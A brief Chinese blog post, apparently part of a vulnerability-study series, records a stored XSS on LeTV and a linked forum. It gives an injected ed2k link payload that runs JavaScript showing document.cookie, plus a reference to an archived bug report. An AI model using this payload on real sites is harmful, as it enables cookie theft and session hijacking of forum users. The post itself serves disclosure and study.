【漏洞学习——XSS】乐视网存储型XSS

版权声明:严禁将博客中涉及到的技术用于恶意破坏,如果造成法律责任,博主概不负责! https://blog.csdn.net/Fly_hps/article/details/84387205

漏洞细节

http://ui.letv.com/
http://bbs.wangjiu.com/forum.php
发贴插入ed2k://|file|test|'+alert(document.cookie)+'|test/

参见:https://bugs.shuimugan.com/bug/view?bug_no=59757

猜你喜欢

转载自blog.csdn.net/Fly_hps/article/details/84387205